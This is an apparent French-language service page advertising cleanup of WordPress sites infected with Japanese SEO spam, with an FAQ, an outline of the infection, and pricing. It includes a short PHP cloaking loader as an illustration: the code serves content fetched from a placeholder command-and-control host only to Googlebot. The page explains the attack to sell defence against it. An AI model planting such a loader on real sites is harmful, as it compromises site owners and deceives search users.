Pourquoi Google affiche-t-il des caractères japonais pour mon site ?

Un attaquant a injecté des pages de spam masquées qui servent du contenu en japonais à Googlebot tout en montrant votre site normal aux visiteurs ordinaires. L'injection réécrit généralement le sitemap WordPress et ajoute des centaines d'URLs synthétiques que Googlebot crawle puis indexe.

Le spam SEO japonais est-il la même chose qu'un pharma hack ?

Mécaniquement similaire — les deux sont des campagnes de spam SEO qui abusent d'un site compromis pour des backlinks et du classement — mais le payload diffère. Le spam SEO japonais pousse des contrefaçons (souvent en japonais). Le spam pharma pousse des pages sur la dysfonction érectile et les médicaments sur ordonnance. L'approche de nettoyage est la même.

Le spam reviendra-t-il après le nettoyage ?

Not if the entry vector is closed. The infection usually arrives via a vulnerable plugin or stolen admin credential. Every cleanup includes vector identification and hardening so the same hole can't be reused.

Combien de temps avant que Google retire les mauvais résultats ?

Après le nettoyage, les mauvaises URLs renvoient un 404 et sont retirées de l'index au fil des cycles de crawl suivants. Nous soumettons des demandes de réexamen à Google Safe Browsing et demandons l'indexation via Search Console ; le délai est fixé par Google, pas par nous, mais la plupart des sites récupèrent en quelques semaines.

// SPAM SEO JAPONAIS · MASQUÉ · NETTOYÉ

Japanese SEO spam removal.

Suppression manuelle de l'injection de spam SEO japonais. Nettoyage fichiers et base de données. Purge du sitemap. Vecteur d'entrée identifié. Demandes de réexamen soumises. Forfait $279.

Démarrer un nettoyage → Comment l'infection fonctionne

§ 01 — MÉCANISME

Ce qu'est le « spam SEO japonais », techniquement.

Un attaquant plante un loader PHP sur votre site (généralement dans wp-content/plugins/ ou wp-content/uploads/). Le loader génère des milliers de pages synthétiques avec des mots-clés japonais et des titres de produits japonais. Il réécrit votre sitemap pour que Googlebot les trouve. Les vrais visiteurs ne voient jamais le spam — le loader vérifie le User-Agent et sert votre site normal aux humains.

Le temps que vous le remarquiez, Google a indexé des centaines ou milliers d'URL en japonais sur votre domaine. Search Console envoie un avertissement de sécurité par e-mail. Les positions chutent. Le libellé « Piraté : injection de contenu » apparaît dans Search Console.

// LOADER DE CLOAKING TYPIQUE

01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

§ 02 — CE QUE NOUS SUPPRIMONS

Chaque endroit où cette infection se cache.

[ LOADERS DE FICHIERS ]
PHP obfusqué dans plugins, mu-plugins, thèmes et uploads. Nous lisons les diffs, pas les noms de fichiers.
[ BASE DE DONNÉES ]
Contenu spam injecté dans wp_posts, entrées wp_options autoload malveillantes, wp_usermeta suspect.
[ SITEMAP ]
Entrées de sitemap synthétiques générées supprimées ; sitemap propre régénéré et resoumis à Search Console.
[ HTACCESS ]
Règles de réécriture .htaccess et nginx qui redirigent Googlebot ou des chemins spécifiques — annulées.
[ UTILISATEURS ADMIN ]
Comptes administrateur dormants créés par le loader — supprimés. Tous les secrets admin restants sont rotés.
[ VECTEUR D'ENTRÉE ]
Plugin vulnérable ou identifiant volé identifié et fermé. Sans cette étape, le même trou est réutilisé en quelques semaines.

§ TARIFS

Forfait $279. Une seule fois. Par site.

[ RESCUE ]

$279

FORFAIT · UNIQUE · PAR SITE

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage →

[ SHIELD ]

$29 / mo

PAR SITE · RÉSILIATION À TOUT MOMENT

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →